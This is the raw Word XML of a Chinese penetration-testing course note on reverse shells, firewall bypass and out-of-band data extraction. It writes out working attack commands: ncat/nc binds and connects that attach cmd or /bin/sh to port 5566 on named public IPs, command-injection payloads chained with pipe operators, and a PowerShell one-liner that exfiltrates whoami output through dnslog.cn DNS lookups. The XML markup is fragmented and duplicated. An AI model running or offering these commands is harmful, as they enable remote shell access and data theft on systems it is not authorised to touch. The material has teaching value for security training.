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5894" w14:textId="77777777" w:rsidR="009F3DC8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="triple" w:sz="8" w:space="0" w:color="FC0403"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="0"/>
      <w:commentRangeStart w:id="1"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>基础</w:t>
      </w:r>
      <w:commentRangeEnd w:id="0"/>
      <w:commentRangeEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:commentReference w:id="0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:commentReference w:id="1"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>入门</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>反弹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>SHELL&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>不回显带外</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>正反向连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>防火墙出入站</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>文件下载</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064AD952" w14:textId="77777777" w:rsidR="009F3DC8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EE01D63" wp14:editId="76D4689B">
            <wp:extent cx="5760085" cy="13055003"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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5760085" cy="13055003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 w14:paraId="007FD112" w14:textId="77777777" w:rsidR="009F3DC8" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DBDF613" wp14:editId="0B9602CF">
                <wp:extent cx="5760085" cy="5760085"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="5" name="文本框 madds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5695D79F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#知识点：</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4D7DE3E0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1、Web常规-系统&amp;中间件&amp;数据库&amp;源码等</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="719BDE8A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2、Web其他-前后端&amp;软件&amp;Docker&amp;</w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rStyle w:val="melo-codeblock-Base-theme-char"/>
                              </w:rPr>
                              <w:t>分配站</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rStyle w:val="melo-codeblock-Base-theme-char"/>
                              </w:rPr>
                              <w:t>等</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="03B54FFE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3、Web拓展-CDN&amp;WAF&amp;OSS&amp;</w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rStyle w:val="melo-codeblock-Base-theme-char"/>
                              </w:rPr>
                              <w:t>反向&amp;</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rStyle w:val="melo-codeblock-Base-theme-char"/>
                              </w:rPr>
                              <w:t>负载均衡等</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5DCA807D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-----------------------------------</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3CB0249C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1、APP架构-封装&amp;原生态&amp;H5&amp;flutter等</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4C794F69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2、小程序架构-Web&amp;H5&amp;JS&amp;VUE框架等</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="64E847B5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-----------------------------------</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3E13DF6B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t>1、渗透命令-常规命令&amp;文件上传下载</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1B6EDE98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t>2、反弹Shell-防火墙策略&amp;正反向连接</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="075E3514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t>3、数据回显-查询带外&amp;网络协议层级</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4426FB29" w14:textId="77777777" w:rsidR="009F3DC8" w:rsidRDefault="009F3DC8">
                            <w:pPr>
                              <w:pStyle w:val="melo-codeblock-Base-theme-para"/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="267E24E5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#章节点</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="505A263A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应用架构：Web/APP/</w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rStyle w:val="melo-codeblock-Base-theme-char"/>
                              </w:rPr>
                              <w:t>云应用</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rStyle w:val="melo-codeblock-Base-theme-char"/>
                              </w:rPr>
                              <w:t>/小程序/负载均衡等</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2D797263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安全产品：CDN/WAF/IDS/IPS/蜜罐/防火墙/杀毒等</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="27260859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渗透命令：文件上传下载/端口服务/Shell反弹等</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="791B03A3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抓包技术：HTTP/TCP/UDP/ICMP/DNS/封包/代理等</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1C678518" w14:textId="77777777" w:rsidR="009F3DC8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算法加密：数据编码/密码算法/密码保护/反编译/</w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rStyle w:val="melo-codeblock-Base-theme-char"/>
                              </w:rPr>
                              <w:t>加壳等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BDF613" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="文本框 maddsg" o:spid="_x0000_s1026" type="#_x0000_t202" style="width:453.55pt;height:45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" fillcolor="#fafafa">
                <v:stroke opacity="6682f"/>
                <v:textbox style="mso-fit-shape-to-text:t" inset="31.5pt,9pt,9pt,9pt">
                  <w:txbxContent>
                    <w:p w14:paraId="5695D79F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#知识点：</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4D7DE3E0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1、Web常规-系统&amp;中间件&amp;数据库&amp;源码等</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="719BDE8A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2、Web其他-前后端&amp;软件&amp;Docker&amp;</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rStyle w:val="melo-codeblock-Base-theme-char"/>
                        </w:rPr>
                        <w:t>分配站</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rStyle w:val="melo-codeblock-Base-theme-char"/>
                        </w:rPr>
                        <w:t>等</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="03B54FFE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3、Web拓展-CDN&amp;WAF&amp;OSS&amp;</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rStyle w:val="melo-codeblock-Base-theme-char"/>
                        </w:rPr>
                        <w:t>反向&amp;</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rStyle w:val="melo-codeblock-Base-theme-char"/>
                        </w:rPr>
                        <w:t>负载均衡等</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5DCA807D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-----------------------------------</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3CB0249C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1、APP架构-封装&amp;原生态&amp;H5&amp;flutter等</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4C794F69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2、小程序架构-Web&amp;H5&amp;JS&amp;VUE框架等</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="64E847B5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-----------------------------------</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3E13DF6B" w14:textId="77777777" w:rsidR="009F3DC8" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:pStyle w:val="melo-codeblock-Base-theme-para"/>
                      </w:pPr>
                      <w:r>
                        <w:t>1、渗透命令-常规命令&amp;文件上传下载</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1B6EDE98" w14:textId="77777777" w:rsidR="009F3DC8" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:pStyle w:val="melo-codeblock-Base-theme-para"/>
                      </w:pPr>
                      <w:r>
                        <w:t>2、反弹Shell-防火墙策略&amp;正反向连接</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="075E3514" w14:textId="77777777" w:rsidR="009F3DC8" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:pStyle w:val="melo-codeblock-Base-theme-para"/>
                      </w:pPr>
                      <w:r>
                        <w:t>3、数据回显-查询带外&amp;网络协议层级</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4426FB29" w14:textId="77777777" w:rsidR="009F3DC8" w:rsidRDefault="009F3DC8">
                      <w:pPr>
                        <w:pStyle w:val="melo-codeblock-Base-theme-para"/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="267E24E5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#章节点</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="505A263A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应用架构：Web/APP/</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rStyle w:val="melo-codeblock-Base-theme-char"/>
                        </w:rPr>
                        <w:t>云应用</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rStyle w:val="melo-codeblock-Base-theme-char"/>
                        </w:rPr>
                        <w:t>/小程序/负载均衡等</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2D797263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安全产品：CDN/WAF/IDS/IPS/蜜罐/防火墙/杀毒等</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="27260859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渗透命令：文件上传下载/端口服务/Shell反弹等</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="791B03A3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抓包技术：HTTP/TCP/UDP/ICMP/DNS/封包/代理等</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1C678518" w14:textId="77777777" w:rsidR="009F3DC8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算法加密：数据编码/密码算法/密码保护/反编译/</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rStyle w:val="melo-codeblock-Base-theme-char"/>
                        </w:rPr>
                        <w:t>加壳等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2844E72" w14:textId="77777777" w:rsidR="009F3DC8" w:rsidRDefault="009F3DC8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="thinThickThinSmallGap" w:sz="8" w:space="0" w:color="030103"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68C23A03" w14:textId="77777777" w:rsidR="009F3DC8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14F672C1" wp14:editId="4D9D0864">
            <wp:extent cx="5760085" cy="3432722"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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760085" cy="34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hd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C57B999" wp14:editId="6C77F12E">
            <wp:extent cx="5760085" cy="3453768"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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 rotWithShape="1">
                    <a:blip r:embed="rId10"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760085" cy="34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7F25" w14:textId="77777777" w:rsidR="009F3DC8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="thinThickThinSmallGap" w:sz="8" w:space="0" w:color="030402"/>
        </w:pBd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演示案例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5872AA86" w14:textId="77777777" w:rsidR="009F3DC8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pP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实用案例1：文件上传下载-解决无图形化&amp;解决数据传输</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4204A8BA" w14:textId="77777777" w:rsidR="009F3DC8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</w:pP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实用案例2：反弹Shell命令-解决数据回显&amp;解决数据通讯</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C9BD70" w14:textId="77777777" w:rsidR="009F3DC8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</w:pP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实际案例1：防火墙绕过-正向连接&amp;反向连接&amp;内网服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217551AC" w14:textId="77777777" w:rsidR="009F3DC8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="thinThickThinSmallGap" w:sz="8" w:space="0" w:color="030402"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pP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实际案例2：防火墙组合数据不回显-ICMP带外查询</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Dnslog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2CCB011D" w14:textId="77777777" w:rsidR="009F3DC8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF0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06C604E" wp14:editId="68B76E12">
                <wp:extent cx="5760085" cy="5760085"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="13" name="文本框 jam5i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532D3CE7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sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                              <w:t>#</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00E22649">
                              <w:rPr>
                                <w:sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                              <w:t>常规基本渗透命令详解</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="09863B85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https://blog.csdn.net/weixin_43303273/article/details/83029138</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7DA6095F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65C27A38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#实用案例1：文件上传下载-解决无图形化&amp;解决数据传输</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="70D7A828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sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                              <w:t>命令生成：</w:t>
                            </w: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https://forum.ywhack.com/bountytips.php?download</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1C5B035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Linux：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wget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curl python ruby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perl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java等</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6A9CD1F0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Windows：PowerShell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Certutil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Bitsadmin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msiexec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mshta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rundll32等</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1D2EC526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264DF7EE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#实用案例2：反弹Shell命令-解决数据回显&amp;解决数据通讯</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="182D36FC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sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                              <w:t>命令生成：</w:t>
                            </w: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https://forum.ywhack.com/shell.php</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="19A32D01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1、正向连接：</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00E22649">
                              <w:rPr>
                                <w:sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                              <w:t>本地监听等待对方连接</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="24022F78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Linux</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00E22649">
                              <w:rPr>
                                <w:sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                              <w:t>控制</w:t>
                            </w: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Windows</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="02E3D99A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//绑定CMD到本地5566端口</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7A1F9599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-e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cmd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lvp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5566</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="28BB18AE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//主动连接目标5566</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2CAE8CA0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ncat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47.122.23.131 5566</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3F559F8E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52D6E4B9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Windows</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00E22649">
                              <w:rPr>
                                <w:sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                              <w:t>控制</w:t>
                            </w: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Linux</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="19117AC1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//绑定SH到本地5566端口</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4E9F0705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ncat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-e /bin/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sh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lvp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5566</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="45DD1A8A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//主动连接目标5566</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4E500429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47.94.236.117 5566</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6EBC858A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515BE782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2、反向连接：</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00E22649">
                              <w:rPr>
                                <w:sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                              <w:t>主动给出去，对方监听</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4DCD411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//绑定CMD到目标5566端口</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5647DC09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ncat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-e /bin/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sh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47.122.23.131 5566</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1DD131B1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//等待5566连接</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7D6C26C4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lvvp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5566</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="39183ABE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71926981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//绑定CMD到目标5566端口</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="18E67BF1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-e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cmd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47.94.236.117 5566</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5D2D8C9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//等待5566连接</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3778487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ncat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lvvp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5566</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1C81BB01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37EFD5C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#实际案例1：防火墙绕过-正向连接&amp;反向连接&amp;内网服务器</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="06E9FB68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sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                              <w:t>管道符：</w:t>
                            </w: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| (管道符号) ||（逻辑或） &amp;&amp;（逻辑与）  &amp;(后台任务符号)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="595E87C4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sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                              <w:t>Windows-&gt;</w:t>
                            </w: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| &amp; || &amp;&amp;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1A8B52E1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sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                              <w:t>Linux-&gt;; | || &amp; &amp;&amp; ``(特有``和;)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6DF7520F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例子：</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4413FED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ping -c 1 127.0.0.1 ;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whoami</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="4E25300A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ping -c 1 127.0.0.1 |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whoami</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="03B0BB9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ping -c 1 127.0.0.1 ||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whoami</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="2E1A308E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ping -c 1 127.0.0.1 &amp;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whoami</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="3DC58C1B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ping -c 1 127.0.0.1 &amp;&amp;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whoami</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="5E9CBD73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ping -c 1 127.0.0.1 `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whoami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`</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3E1CD638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7352FC54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1、判断windows</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="51A7287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2、windows没有自带的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</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="14C9148F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3、想办法上传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反弹权限</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="012680EE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4、反弹</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3D2CC8CF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开启入站策略，采用反向连接</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7A207654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Linux：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ncat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lvvp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5566</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4A68649C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Windows：127.0.0.1 |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-e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cmd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47.94.236.117 5566</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="21E88453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开启出站策略，采用正向连接</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="70291AD9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Linux：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ncat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-e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cmd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47.122.23.131 5566</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="73F7E799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Windows：127.0.0.1 |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nc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-e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cmd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-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lvvp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5566</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="087CC0A9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正反</w:t>
                            </w:r>
                            <w:proofErr w:type="gram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向反弹</w:t>
                            </w:r>
                            <w:proofErr w:type="gram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案例-内网服务器</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="34F7D269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sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                              <w:t>只能内</w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r w:rsidRPr="00E22649">
                              <w:rPr>
                                <w:sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                              <w:t>网主动</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r w:rsidRPr="00E22649">
                              <w:rPr>
                                <w:sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                              <w:t>交出数据，反向连接</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="224FD6C5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6BEF0820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#实际案例2：防火墙组合数据不回显-ICMP带外查询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Dnslog</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="4C17952E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出站入站都开启策略（数据不回显）：OSI网络七层</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3FC2F2BB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127.0.0.1 |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powershell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$x=whoami;$x=$x.Replace('\','xxx');$y='.f4an93.dnslog.cn';$z=$x+$y;ping $z</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="34E6D4CA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167E0F98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7D28F542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漏洞有，但是数据不回显：</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2755EA47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1、反弹shell</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="26095EAA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2、带外查询</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5081746D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115C5D2E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确定能执行命令</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1F6F708D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windows</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="113D859A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003B1727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` ` ; </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="75F3DB1A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27296D88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7B5BD0A5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ping 127.0.0.1 | </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0C604CC5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656DDABC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为什么要这样写</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="426D4ED7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cmd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无法执行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whoami</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="76766133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用到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powershell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变量赋值 把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whoami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执行结果给变量</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="367BCC3A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结果带有“\” 导致ping无法执行</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="465699B9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03542115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powershell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$x=whoami;$x=$x.Replace('\','xxx');$y='.vpod5d.dnslog.cn';$z=$x+$y;ping $z</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4D85D20F" w14:textId="77777777" w:rsidR="009F3DC8" w:rsidRPr="00E22649" w:rsidRDefault="009F3DC8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21D86278" w14:textId="77777777" w:rsidR="009F3DC8" w:rsidRPr="00E22649" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:pStyle w:val="melo-codeblock-Base-theme-para"/>
                              <w:rPr>
                                <w:sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                            </w:pPr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127.0.0.1 | </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart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>powershell</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00E22649">
                              <w:rPr>
                                <w:rStyle w:val="melo-codeblock-Base-theme-char"/>
                                <w:sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> $x=ver;$x=$x.Replace('\','xxx');$y='.vpod5d.dnslog.cn';$z=$x+$y;ping $z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6C604E" id="文本框 jam5i8" o:spid="_x0000_s1027" type="#_x0000_t202" style="width:453.55pt;height:45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" fillcolor="#fafafa">
                <v:stroke opacity="6682f"/>
                <v:textbox style="mso-fit-shape-to-text:t" inset="31.5pt,9pt,9pt,9pt">
                  <w:txbxContent>
                    <w:p w14:paraId="532D3CE7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sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t>#</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00E22649">
                        <w:rPr>
                          <w:sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t>常规基本渗透命令详解</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="09863B85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https://blog.csdn.net/weixin_43303273/article/details/83029138</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7DA6095F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65C27A38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#实用案例1：文件上传下载-解决无图形化&amp;解决数据传输</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="70D7A828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sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
